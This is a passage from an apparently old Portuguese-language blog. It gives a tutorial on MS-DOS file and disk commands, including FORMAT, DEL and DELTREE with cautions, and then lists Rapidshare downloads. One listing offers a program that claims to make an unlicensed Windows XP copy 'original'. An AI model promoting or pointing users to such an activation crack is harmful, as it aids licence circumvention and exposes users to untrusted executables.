Comando que remove um subdiretório a partir do drive corrente. O subdiretório somente será eliminado se não conter nenhum arquivo ou subdiretório em seu interior:
Sintaxe: RD [caminho] ou RMDIR [caminho]
Exemplo:
C:\>RD PROFESSOR\ALUNOS - remove o subdiretório ALUNOS do diretório PROFESSOR.
C:\>RD PROFESSOR - remove o diretório PROFESSOR.
TREE
Comando que exibe graficamente a árvore de diretórios e subdiretórios a partir do diretório-raiz para que o usuário tenha a organização hierarquia do seu disco. Este comando pode conter algumas variações para obter-se um resultado diferente:
* /F Exibe a árvore de subdiretórios, mostrando também os arquivos existentes dentro dele.
* /A Instrui o comando TREE a usar os caracteres gráficos disponíveis em todas as Páginas de Código e permite um processo de impressão mais rápido.
Exemplo:
C:\>TREE
C:\>TREE /F
C:\>TREE /A
CHKDSK
Comando que checa o disco mostrando informações sobre este na tela:
Sintaxe: CHKDSK [unidade:]
Exemplo:
C:\>CHKDSK C: - checa o disco rígido C:
C:\>CHKDSK A: - checa o disco flexível A:
MEM
Comando que fornece informações sobre a memória:
Sintaxe: MEM
Exemplo:
C:\>MEM
RENAME ou REN
Comando que faz a renomeação (TROCA) do nome ou extensão de um arquivo a partir do drive corrente:
Sintaxe: RENAME ou REN [unidade:] [caminho] { Nome Antigo } { Nome Novo }
Exemplo:
C:\> REN SMART.DOC INSTRUTOR.DOC - muda o nome do arquivo SMART.DOC para INSTRUTOR.DOC
C:\> REN *.DPR *.PRG - muda a extensão dos arquivos em .DPR para .PRG
COPY
Comando que copia um arquivo ou grupo de arquivos de uma ORIGEM para um DESTINO:
Sintaxe: COPY [unidade:] [caminho] { Nome Origem } [unidade:] [caminho] { Nome Destino }
Exemplo:
C:\>COPY A:\TESTE.XXX C:\AULA , faz a cópia de arquivo TESTE.XXX do DRIVE de origem A: para o DRIVE de destino C:\AULA.
Neste comando utiliza-se muito os caracteres "curingas", que têm a função de substituir qualquer caractere ou grupos de caracteres. Os caracteres curingas são representados abaixo de acordo com a sua finalidade:
* - para qualquer quantidade de caracteres.
? - para um caractere.
Exemplo:
C:\>COPY C:DOSS*.* C:AULA , faz a cópia de todos os arquivos que têm o nome que se inicia com a letra S do diretório de origem C:\DOS para o diretório de destino C:\AULA.
C:\>COPY C:\DOSVENDAS?.DOC C:\AULA , faz cópia de todos os arquivos que têm a palavra VENDAS + 1 CARACTER.
DISKCOPY
Quando necessitamos fazer uma cópia das informações de um disquete, podemos utilizar o comandos Diskcopy. Este comando faz a duplicação de um disco, sendo que os dois discos devem possuir o mesmo tamanho e capacidade. Este comando só permite a duplicação de discos flexíveis. Além disso, este comando pode conter variações para obter-se uma resposta diferente:
* /V = Faz a verificação durante a duplicação do disco.
Sintaxe: DISKCOPY [unidade:] [unidade:] /V
Exemplo:
C:\>DISKCOPY A: B: - faz a duplicação de um disco na unidade A: para unidade B:, sendo que os dois discos devem possuir o mesmo tamanho e capacidade.
XCOPY
Comando que copia arquivos seletivamente, lendo em sub-diretórios diferentes na origem e podendo criar os sub-diretórios na unidade de destino, se assim for desejado. Este comando pode conter variações para obter-se uma resposta diferente:
* ORIGEM Drive, caminho e nome dos arquivos de origem.
* DESTINO Drive, caminho e nome dos arquivos de destino.
* /M Copia os arquivos de origem e os "marca".
* /D: data Copia os arquivos de origem que foram modificados na data definida em
"data" ou depois dela, (mm,dd,yy é o formato default")
* /S Copia os arquivos em diretórios e subdiretórios, a não ser que estejam vazios.
* /E Copia os subdiretórios mesmo que estejam vazios.
Sintaxe: XCOPY [ ORIGEM] [DESTINO] /M /D:data /S /E /V
Exemplo:
C:\>XCOPY C:DOS A: , copia o diretório DOS para o drive A: .
MOVE
Comando que tem duas funções: Renomear diretórios ou mover arquivos de um diretório para outro:
Sintaxe: MOVE [unidade:] [caminho] [nome antigo] [nome novo] ou [Origem] [Destino]
Exemplo:
C:\>MOVE C:\AULA C:\TESTE - renomeia o diretório C:\AULA para C:\TESTE
C:\>MOVE C:\AULA*.* A:\ - faz a movimentação de todos os arquivos do drive de origem C:\AULA para o drive de destino A:\, deixando assim o diretório C:\AULA vazio.
TYPE
Comando que exibe o conteúdo de um determinado arquivo:
Sintaxe: TYPE [unidade:] [CAMINHO] { Nome do Arquivo }
Exemplo:
C:\TYPE CONFIG.SYS Exibe o conteúdo do arquivo CONFIG.SYS na tela.
Utilizando este comando você pode também imprimir o conteúdo de um arquivo bastando para tanto adicionar a terminação > PRN ou > LPT1 ao comando.
Exemplo:
C:\>TYPE CONFIG.SYS > PRN Imprime o conteúdo do arquivo CONFIG.SYS.
MORE
Comando que exibe o conteúdo de um determinado arquivo, fazendo uma pausa cada vez que a tela é preenchida:
Sintaxe: MORE < [unidade:] [caminho] { Nome do Arquivo }
Exemplo:
MORE < TESTE.TXT
FORMAT
Antes de utilizar ou reutilizar um disco novo, você precisa prepará-lo para receber as informações e, essa preparação do disco é chamada de formatação, que tem a função de redefinir trilhas e setores na superfície magnética do disco. Num disco formatado podemos copiar um arquivo, um diretório de vários arquivos ou até um disco inteiro. A formatação deve ser aplicada com cuidado pois destrói o conteúdo anterior do disco. Este comando pode conter algumas variações para obter-se uma resposta diferente:
/S Formata o disco na unidade especificada e insere o Sistema Operacional DOS
/4 Formata o disquete de baixa densidade em drives de alta densidade
/Q Formata rapidamente o disco da unidade (Formatação Rápida)
/U formata o disco da unidade independente da condição (UNCONDICIONABLE)
Sintaxe: FORMAT [unidade:] /Q /U /S /4
Exemplo:
C:\>FORMAT A: - formata o disco na unidade A:
ATENÇÃO: tenha cuidado nas formatações de discos ,pois elas fazem com que o conteúdo do disco seja perdido. Vale lembrar que esta operação se torna muito mais crítica quando estamos formatando a unidade C ( FORMAT C:\ ), operação não indicada para pessoas com pouco conhecimento no assunto.
UNFORMAT
Caso aconteça de você formatar um disco por acidente, o MS-DOS permite a recuperação das informações, há não ser que você tenha utilizado o parâmetro /U em sua formatação. O comando UNFORMAT recupera as informações de um disco formatado. Este comando pode conter variações para obter-se uma resposta diferente:
/L Recupera as informações de um disco, mostrando a lista de arquivos e diretórios
/TEST Lista todas informações, mas não refaz o disco
Sintaxe: UNFORMAT [unidade:] /L /TEST /P
Exemplo:
C:\>UNFORMAT A: - desformata o disco na unidade A:
DEL ou DELETE
Comando que faz a eliminação de arquivos:
Sintaxe: DEL [unidade] [caminho] { Nome do Arquivo }
Exemplo:
DEL C:\WINWORD\CASTAS.DOC - deleta o arquivo CARTAS.DOC do diretório WINWORD
DEL *.DOC , deleta todos os arquivos com extensão .DOC
do diretório corrente
DEL C:\ADMIN\*.* - deleta todos os arquivos do diretório ADMIN
UNDELETE
No desenvolvimento diário de suas tarefas do dia a dia é muito comum você apagar um ou mais arquivos, e depois descobrir que aquele(s) arquivo(s) era(m) importante(s). A partir da versão 5.0 do MS-DOS houve a implantação de um comando muito útil chamado Undelete, que nos permite (às vezes...) recuperar estes arquivos. Existem versões deste utilitário para o MS-DOS ou MS-Windows:
Sintaxe: UNDELETE [unidade:] [caminho] { Nome do Arquivo }
Exemplo:
UNDELETE C:\WINWORD\CARTAS.DOC - recupera o arquivo CARTAS.DOC do diretório WINWORD
DELTREE
Comando que apaga um ou mais subdiretórios do disco a partir do diretório corrente:
O comando deltree apaga todos os arquivos e subdiretórios dentro de um diretório de uma só vez. Como precaução ele sempre exibirá uma mensagem na tela perguntando se você realmente deseja apagar.
Exemplo:
C:\>DELTREE PROFESSOR
Utilizando-se deste comando o usuário poderá apagar subdiretórios com mais rapidez e eficiência.

GUIA BÁSICO DE HTML


Aprenda a fazer sites e blogs através de comandos simples de html, apenas lendo este tutorial.

Formato: RAR/TXT

Tamanho: 36 KB

Hospedagem: Rapidshare


VALIDE SEU XP





Este programa vem acompanhado de um tutorial que ensina
passo a passo tornando fácil o uso até para leigos. ao terminar de executar
as etapas seu xp será original

Formato: RAR/TXT



Tamanho: 4.05mb


Hospedagem: Rapidshare




GUIA BÁSICO DE HARDWARES




Guia rápido que encina os conhecimentos básicos que
você precisa para entender seu computador.


Formato:
RAR/PDF


Tamanho:
1.31mb


Hospedagem:
Rapidshare





 
© 2007 Template feito por Templates para Voc�